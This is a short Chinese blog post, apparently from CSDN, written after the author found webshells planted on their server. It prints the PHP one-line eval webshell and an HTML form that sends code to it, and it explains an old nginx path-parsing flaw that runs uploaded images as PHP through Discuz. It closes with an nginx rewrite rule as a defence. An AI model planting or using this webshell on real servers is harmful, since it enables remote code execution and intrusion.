关于php一句话木马

php文件操作 专栏收录该内容
6 篇文章 0 订阅

服务器上发现被植了很多木马,而且还让人肆意使用...NND 

<?php @eval($_POST['c']);?>  

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行 

<html>
<body>
<form action="a.php" method="post">
<input type="text" name="c" value="phpinfo();">
<input type="submit" value="submit">
</form>
</body>
</html>




仅此做个记录,php一定要做好过滤系统。一定要处理上传的东西。

nginx 上传漏洞及 discuz 漏洞处理

由于nginx早期的版本,至少我在用 0.9.X 的版本依旧存在漏洞,导致处理过的图片可以执行php代码 
简单的说就是写好的php代码将扩展名改为图片,如 xx.jpg 文件后通过 discuz 等开源论坛的上传功能上传后可以通过 http://xxx.com/bbs/data/xxxxxxxx/xx.jpg/1.php 方式执行 xx.php里面的代码 

对于discuz 论坛使用nginx的服务器可以使用rewrite方式防止代码执行 

Nginx.conf代码   收藏代码
  1. rewrite ^/bbs/data/.*\.(jsp|php)$ http://www.xxx.com/ break;  

其他如source及其他文件夹下也存在各种各样的问题,简单的处理方法也是禁止php的运行 


  • 4
    点赞
  • 0
    评论
  • 5
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值